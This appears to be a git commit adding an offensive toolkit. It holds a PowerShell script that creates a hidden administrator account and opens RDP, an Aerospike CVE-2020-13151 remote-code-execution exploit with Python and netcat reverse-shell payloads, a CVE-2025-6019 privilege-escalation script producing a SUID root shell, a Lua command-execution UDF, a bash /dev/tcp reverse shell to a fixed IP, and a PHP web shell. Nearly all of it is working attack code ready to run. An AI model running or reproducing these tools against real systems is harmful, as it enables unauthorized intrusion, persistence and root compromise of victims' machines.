Initial commit

.gitignore

@@ -0,0 +1 @@
+venv/

RDPEnabler.ps1

@@ -0,0 +1,50 @@
+#Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
+#Get-ExecutionPolicy -Scope CurrentUser
+
+# Define the password for the user
+$Password = "YourSecurePassword123"
+
+# Create the user 'pwned' with the specified password
+Write-Host "Creating user 'pwned'..."
+try {
+    New-LocalUser -Name "pwned" -Password (ConvertTo-SecureString $Password -AsPlainText -Force) -FullName "pwned User" -Description "Automatically created user" -ErrorAction Stop
+    Write-Host "User 'pwned' has been created."
+} catch {
+    Write-Host "User 'pwned' already exists or an error occurred."
+}
+
+# Add the user 'pwned' to the Administrators group
+Write-Host "Adding user 'pwned' to the Administrators group..."
+try {
+    Add-LocalGroupMember -Group "Administrators" -Member "pwned" -ErrorAction Stop
+    Write-Host "User 'pwned' has been added to the Administrators group."
+} catch {
+    Write-Host "User 'pwned' is already a member of the Administrators group or an error occurred."
+}
+
+# Enable Remote Desktop
+Write-Host "Enabling Remote Desktop..."
+try {
+    Set-ItemProperty -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -Name "fDenyTSConnections" -Value 0 -ErrorAction Stop
+    Write-Host "Remote Desktop has been enabled."
+} catch {
+    Write-Host "Failed to enable Remote Desktop or it is already enabled."
+}
+
+# Check if the firewall rule for RDP exists
+$rdpRule = Get-NetFirewallRule -DisplayName "Remote Desktop" -ErrorAction SilentlyContinue
+
+if ($rdpRule) {
+    Write-Host "Firewall rule 'Remote Desktop' already exists. Skipping creation."
+} else {
+    Write-Host "Creating firewall rule for Remote Desktop..."
+    try {
+        New-NetFirewallRule -Name "RDP Rule" -DisplayName "Remote Desktop" -Protocol TCP -LocalPort 3389 -Action Allow -Direction Inbound -ErrorAction Stop
+        Write-Host "Firewall rule for Remote Desktop has been created."
+    } catch {
+        Write-Host "An error occurred while creating the firewall rule for Remote Desktop."
+    }
+}
+
+# Notify the user that all tasks have been completed
+Write-Host "All tasks completed successfully."

aerospike_exploit.py

@@ -0,0 +1,167 @@
+#!/usr/bin/env python3
+import argparse
+import random
+import os, sys
+from time import sleep
+import string
+
+# requires aerospike package from pip
+import aerospike
+# if this isn't installing, make sure os dependencies are met
+# sudo apt-get install python-dev
+# sudo apt-get install libssl-dev
+# sudo apt-get install python-pip
+# sudo apt-get install zlib1g-dev
+
+PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
+NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
+
+def _get_client(cfg):
+	try:
+  		return aerospike.client({
+  			'hosts': [(cfg.ahost, cfg.aport)],
+  			 'policies': {'timeout': 8000}}).connect()
+
+	except Exception as e:
+	  	print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
+
+def _send(client, cfg, _cmd):
+	try:
+		print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
+	except Exception as e:
+		print(f"[-] UDF execution returned {e.msg}")
+
+def _register_udf(client, cfg):
+	try:
+		client.udf_put(cfg.udfpath)
+	except Exception as e:
+		print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
+		raise e
+
+def _random_string(l):
+	return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
+
+def _populate_table(client, cfg):
+	ns = cfg.namespace
+	setname = cfg.setname
+	print(f"[+] writing to {ns}.{setname}")
+	try:
+		rec = cfg.dummystring
+		client.put((ns, setname, rec), {'pk':cfg.dummystring})
+		print(f"[+] wrote {rec}")
+	except Exception as e:
+		print(f"[-] unable to write record: {e.msg}")
+		try:
+			if e.msg.startswith('Invalid namespace'):
+				print("Valid namespaces: ")
+				for n in _info_parse("namespaces", client).split(";"):
+					print(n.strip())
+		except:
+			pass
+		sys.exit(13)
+
+def _info_parse(k, client):
+	try: 
+		return [i[1] for i in client.info_all(k).values() ][0]
+	except Exception as e:
+		print(f"error retrieving information: {e.msg}")
+		return []
+
+def _is_vuln(_mj, _mi, _pt, _bd):
+	fixed = [5,1,0,3]
+	found = [_mj, _mi, _pt, _bd]
+
+	if fixed == found:
+		return False
+
+	for ix, val in enumerate(found):
+		if val < fixed[ix]:
+			return True
+		elif val == fixed[ix]:
+			pass
+		else:
+			return False
+
+
+def _version_check(client):
+	print("[+] aerospike build info: ", end="")
+	try:
+		_ver = _info_parse("build", client)
+		print(_ver)
+		mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
+		if _is_vuln(mj, mi, pt, bd):
+			print("[+] looks vulnerable")
+			return
+		else:
+			print(f"[-] this instance is patched.")
+			sys.exit(0)
+
+	except Exception as e:
+		print(f"[+] unable to interpret build number due to {e}")
+		print("[+] continuing anyway... ")
+
+def _exploit(cfg):
+	client = _get_client(cfg)
+	
+	if not client:
+		return
+
+	_version_check(client)
+
+	print(f"[+] populating dummy table.")
+	_populate_table(client, cfg)
+
+	print(f"[+] registering udf")
+	
+	_register_udf(client, cfg)
+
+	if cfg.pythonshell or cfg.netcatshell:
+		sys.stdout.flush()
+		print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
+		sys.stdout.flush()
+		for i in range(4): 
+			print(".", end="")
+			sys.stdout.flush()
+			sleep(1)
+
+		print(".")
+		_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
+	
+	if cfg.cmd:
+		print(f"[+] issuing command \"{cfg.cmd}\"")
+		_send(client, cfg, cfg.cmd)
+
+if __name__ == '__main__':
+	if len(sys.argv) == 1:
+		print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
+		print("... or ... ")
+		print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
+		sys.exit(0)
+
+	parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
+	
+	parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
+	parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
+	parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
+	parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
+	parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
+	parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
+	parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
+	parser.add_argument("--lhost", help="host to use for reverse shell callback")
+	parser.add_argument("--lport", help="port to use for reverse shell callback")
+	parser.add_argument("--cmd", help="custom command to issue against the underlying host")
+	parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
+
+	cfg = parser.parse_args()
+	if not cfg.setname:
+		cfg.setname = 'cve202013151'
+	if not cfg.dummystring:
+		cfg.dummystring = _random_string(16)
+	if not cfg.udfpath:
+		cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
+
+	assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
+	if cfg.pythonshell or cfg.netcatshell:
+		assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
+
+	_exploit(cfg)

dumb.sh

@@ -0,0 +1,259 @@
+#!/bin/bash
+# PoC for CVE-2025-6019: LPE via libblockdev/udisks
+# Author: 0xabdoulaye, Team Guinea Offensive Security
+# Modified to create a 300 MB XFS image and improve resize reliability
+# Usage: Run as root for local mode; run as any user for target mode
+
+# Function to check dependencies
+check_dependencies() {
+    local deps=("dd" "mount" "umount" "udisksctl" "gdbus" "killall" "grep" "chmod" "cp")
+    for dep in "${deps[@]}"; do
+        if ! command -v "$dep" &>/dev/null; then
+            echo "[-] Error: Required tool '$dep' is not installed."
+            exit 1
+        fi
+    done
+    echo "[+] All dependencies are installed."
+}
+
+# Function to check for vulnerable libblockdev/udisks
+check_vulnerability() {
+    echo "[*] Checking for vulnerable libblockdev/udisks versions..."
+    if command -v udisksctl &>/dev/null; then
+        UDISKS_VERSION=$(udisksctl --version 2>/dev/null || echo "unknown")
+        echo "[*] Detected udisks version: $UDISKS_VERSION"
+        echo "[!] Warning: Specific vulnerable versions for CVE-2025-6019 are unknown."
+        echo "[!] Verify manually that the target system runs a vulnerable version of libblockdev/udisks."
+        echo "[!] Continuing with PoC execution..."
+    else
+        echo "[-] Error: udisksctl not found. Ensure udisks2 is installed."
+        exit 1
+    fi
+}
+
+# Function to create a 300 MB XFS image on local machine
+create_xfs_image() {
+    echo "[*] Creating a 300 MB XFS image on local machine..."
+    # Check for root privileges
+    if [ "$(id -u)" -ne 0 ]; then
+        echo "[-] Error: Root privileges required to create XFS image."
+        exit 1
+    fi
+
+    # Create 300 MB image
+    if ! dd if=/dev/zero of=./xfs.image bs=1M count=300 status=progress; then
+        echo "[-] Error: Failed to create xfs.image."
+        exit 1
+    fi
+
+    # Format as XFS with default parameters
+    if ! mkfs.xfs -f ./xfs.image; then
+        echo "[-] Error: Failed to format xfs.image as XFS."
+        rm -f ./xfs.image
+        exit 1
+    fi
+
+    # Create and mount directory
+    mkdir -p ./xfs.mount || { echo "[-] Error: Failed to create xfs.mount directory."; rm -f ./xfs.image; exit 1; }
+    if ! mount -t xfs ./xfs.image ./xfs.mount; then
+        echo "[-] Error: Failed to mount xfs.image."
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+
+    # Verify sufficient space for /bin/bash
+    BASH_SIZE=$(stat -c %s /bin/bash 2>/dev/null || echo 0)
+    if [ "$BASH_SIZE" -eq 0 ]; then
+        echo "[-] Error: /bin/bash not found or inaccessible."
+        umount ./xfs.mount
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+    AVAILABLE_SPACE=$(df --block-size=1 ./xfs.mount | tail -1 | awk '{print $4}')
+    if [ "$AVAILABLE_SPACE" -lt "$BASH_SIZE" ]; then
+        echo "[-] Error: Insufficient space on XFS image for /bin/bash ($BASH_SIZE bytes needed, $AVAILABLE_SPACE available)."
+        umount ./xfs.mount
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+
+    # Copy bash and set SUID
+    if ! cp /bin/bash ./xfs.mount/bash; then
+        echo "[-] Error: Failed to copy /bin/bash."
+        umount ./xfs.mount
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+    if ! chmod 4755 ./xfs.mount/bash; then
+        echo "[-] Error: Failed to set SUID on bash."
+        umount ./xfs.mount
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+
+    # Unmount
+    if ! umount ./xfs.mount; then
+        echo "[-] Error: Failed to unmount xfs.mount."
+        rm -rf ./xfs.image ./xfs.mount
+        exit 1
+    fi
+
+    rm -rf ./xfs.mount
+    echo "[+] 300 MB XFS image created: ./xfs.image"
+    echo "[*] Transfer to target with: scp xfs.image <user>@<host>:"
+}
+
+# Function to exploit vulnerability on target
+exploit_target() {
+    echo "[*] Starting exploitation on target machine..."
+    # Check allow_active status
+    echo "[*] Checking allow_active status..."
+    if ! gdbus call --system --dest org.freedesktop.login1 \
+        --object-path /org/freedesktop/login1 \
+        --method org.freedesktop.login1.Manager.CanReboot | grep -q "('yes',)"; then
+        echo "[-] Error: allow_active status not obtained. Exploitation may fail."
+        echo "[-] Try exploiting CVE-2025-6018 first if applicable."
+        exit 1
+    fi
+    echo "[+] allow_active status confirmed."
+
+    # Check for xfs.image
+    if [ ! -f ./xfs.image ]; then
+        echo "[-] Error: xfs.image not found. Transfer it to the target first."
+        exit 1
+    fi
+
+    # Verify xfs.image integrity
+    echo "[*] Verifying xfs.image integrity..."
+    if ! file ./xfs.image | grep -q "XFS filesystem"; then
+        echo "[-] Error: xfs.image is not a valid XFS filesystem. Recreate it using [L]ocal mode."
+        exit 1
+    fi
+
+    # Stop gvfs-udisks2-volume-monitor
+    echo "[*] Stopping gvfs-udisks2-volume-monitor..."
+    killall -KILL gvfs-udisks2-volume-monitor 2>/dev/null || echo "[*] Note: gvfs-udisks2-volume-monitor was not running."
+
+    # Set up loop device
+    echo "[*] Setting up loop device..."
+    LOOP_DEV=$(udisksctl loop-setup --file ./xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
+    if [ -z "$LOOP_DEV" ]; then
+        echo "[-] Error: Failed to set up loop device."
+        exit 1
+    fi
+    echo "[+] Loop device configured: $LOOP_DEV"
+
+    # Keep filesystem busy
+    echo "[*] Keeping filesystem busy to prevent unmounting..."
+    while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
+    LOOP_PID=$!
+    echo "[+] Background loop started (PID: $LOOP_PID)"
+
+    # Resize filesystem to trigger mount with retries
+    echo "[*] Resizing filesystem to trigger mount..."
+    for i in {1..3}; do
+        gdbus call --system --dest org.freedesktop.UDisks2 \
+            --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
+            --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}' > gdbus_output.txt 2>&1
+        if grep -q "Error resizing filesystem" gdbus_output.txt; then
+            echo "[+] Mount successful (expected error: target is busy)."
+            break
+        fi
+        echo "[*] Attempt $i: Unexpected response during filesystem resize, retrying in 1 second..."
+        echo "[*] gdbus output:"
+        cat gdbus_output.txt
+        echo "[*] Checking udisks2 service status..."
+        systemctl status udisks2 --no-pager 2>/dev/null || echo "[*] udisks2 service not running or inaccessible."
+        sleep 1
+        if [ $i -eq 3 ]; then
+            echo "[-] Error: Failed to resize filesystem after 3 attempts."
+            echo "[*] Debugging: Check udisks2 logs with 'journalctl -xe -u udisks2'"
+            echo "[*] Manual check: Run 'mount | grep /tmp/blockdev' to verify mount."
+            echo "[*] Manual execution: If SUID bash exists, try '/tmp/blockdev*/bash -p'"
+            kill $LOOP_PID 2>/dev/null
+            udisksctl loop-delete --block-device "$LOOP_DEV" 2>/dev/null
+            rm -f gdbus_output.txt
+            exit 1
+        fi
+    done
+
+    # Wait for mount to stabilize
+    echo "[*] Waiting 2 seconds for mount to stabilize..."
+    sleep 2
+
+    # Check for SUID bash with retries
+    echo "[*] Checking for SUID bash in /tmp/blockdev*..."
+    SUID_BASH=""
+    for i in {1..5}; do
+        SUID_BASH=$(find /tmp -maxdepth 2 -path "/tmp/blockdev*/bash" -perm -4000 -type f 2>/dev/null)
+        if [ -n "$SUID_BASH" ]; then
+            echo "[+] SUID bash found: $SUID_BASH"
+            ls -l "$SUID_BASH"
+            break
+        fi
+        echo "[*] Attempt $i: SUID bash not found, retrying in 1 second..."
+        ls -l /tmp/blockdev* 2>/dev/null || echo "[*] No blockdev directories found."
+        sleep 1
+    done
+
+    if [ -z "$SUID_BASH" ]; then
+        echo "[-] Error: SUID bash not found in /tmp/blockdev* after 5 attempts."
+        echo "[*] Debugging: Final contents of /tmp/blockdev*"
+        ls -l /tmp/blockdev* 2>/dev/null || echo "[*] No blockdev directories found."
+        echo "[*] Manual execution: If SUID bash exists, try '/tmp/blockdev*/bash -p'"
+        kill $LOOP_PID 2>/dev/null
+        udisksctl loop-delete --block-device "$LOOP_DEV" 2>/dev/null
+        rm -f gdbus_output.txt
+        exit 1
+    fi
+
+    # Execute SUID shell
+    echo "[*] Executing root shell..."
+    "$SUID_BASH" -p
+    if [ $? -eq 0 ]; then
+        echo "[+] Exploitation successful! Root shell obtained."
+        echo "[*] Background loop (PID: $LOOP_PID) and mount left running to preserve SUID binary."
+        echo "[*] SUID bash remains at: $SUID_BASH"
+        echo "[*] To clean up manually, run:"
+        echo "    kill $LOOP_PID 2>/dev/null"
+        echo "    sudo umount /tmp/blockdev* 2>/dev/null"
+        echo "    sudo udisksctl loop-delete --block-device $LOOP_DEV 2>/dev/null"
+        echo "    rm -rf /tmp/blockdev* ./xfs.image gdbus_output.txt 2>/dev/null"
+    else
+        echo "[-] Error: Failed to execute SUID shell."
+        # Perform cleanup on failure
+        echo "[*] Performing cleanup..."
+        kill $LOOP_PID 2>/dev/null
+        umount /tmp/blockdev* 2>/dev/null
+        udisksctl loop-delete --block-device "$LOOP_DEV" 2>/dev/null
+        rm -rf /tmp/blockdev* ./xfs.image gdbus_output.txt 2>/dev/null
+        echo "[+] Cleanup completed."
+    fi
+}
+
+# Main script
+echo "PoC for CVE-2025-6019 (LPE via libblockdev/udisks)"
+echo "WARNING: Only run this on authorized systems. Unauthorized use is illegal."
+read -p "Continue? [y/N]: " confirm
+if [[ ! "$confirm" =~ ^[Yy]$ ]]; then
+    echo "[-] Aborted by user."
+    exit 1
+fi
+check_dependencies
+check_vulnerability
+echo "Select mode:"
+echo "[L]ocal: Create 300 MB XFS image (requires root)"
+echo "[C]ible: Exploit target system"
+read -p "[L]ocal or [C]ible? (L/C): " choice
+case "${choice,,}" in
+    l|local)
+        create_xfs_image
+        ;;
+    c|cible)
+        exploit_target
+        ;;
+    *)
+        echo "[-] Error: Invalid choice. Use 'L' for local or 'C' for cible."
+        exit 1
+        ;;
+esac

poc.lua

@@ -0,0 +1,69 @@
+---------------------------------------------
+---- POC for executing code on aerospike nodes.
+---- Can be run interactively (below), or with python-based POC.
+---- Works for users with the read-write-udf privilege,
+---- or just if you come across a cluster with security 
+---- disabled :) 
+----
+---- Aerospike blocks os.execute() in lua udfs, but does
+---- not block io.popen.
+----
+---- For the POC, we create a single row set to work with.
+---- Registering the module will copy to all nodes in the 
+---- cluster. Running the POC on sufficiently large 
+---- dataset would eventually execute commands on each node.
+---------------------------------------------
+-- aql> insert into test.k9uf2mx90p (PK, x) values ('1', "A");
+-- OK, 1 record affected.
+
+-- aql> register module '/share/poc.lua'
+-- OK, 1 module added.
+
+-- aql> execute poc.runCMD("whoami") on test.k9uf2mx90p where PK='1'
+-- +---------+
+-- | runCMD  |
+-- +---------+
+-- | "root
+-- " |
+-- +---------+
+-- 1 row in set (0.001 secs)
+
+-- OK
+
+-- aql> 
+-- aql> 
+-- aql> execute poc.runCMD("echo codexecution > /tmp/afile") on test.k9uf2mx90p where PK='1'
+-- +--------+
+-- | runCMD |
+-- +--------+
+-- | ""     |
+-- +--------+
+-- 1 row in set (0.002 secs)
+
+-- OK
+
+-- aql> execute poc.runCMD("cat /tmp/afile") on test.k9uf2mx90p where PK='1'
+-- +-----------------+
+-- | runCMD          |
+-- +-----------------+
+-- | "codexecution
+-- " |
+-- +-----------------+
+-- 1 row in set (0.000 secs)
+
+-- OK
+
+
+---------------------------------------------
+
+
+function runCMD(rec, cmd)
+	local outtext = ""
+	local phandle = io.popen(cmd)
+	io.input(phandle)
+	local foo = io.lines()
+	for f in foo do
+		outtext = outtext .. f .. "\n"
+	end
+	return outtext
+end

rev.sh

@@ -0,0 +1,2 @@
+#!/bin/bash
+bash -i >& /dev/tcp/10.10.14.16/4444 0>&1

wsh.php

@@ -0,0 +1,16 @@
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd'] . ' 2>&1');
+    }
+?>
+</pre>
+</body>
+</html>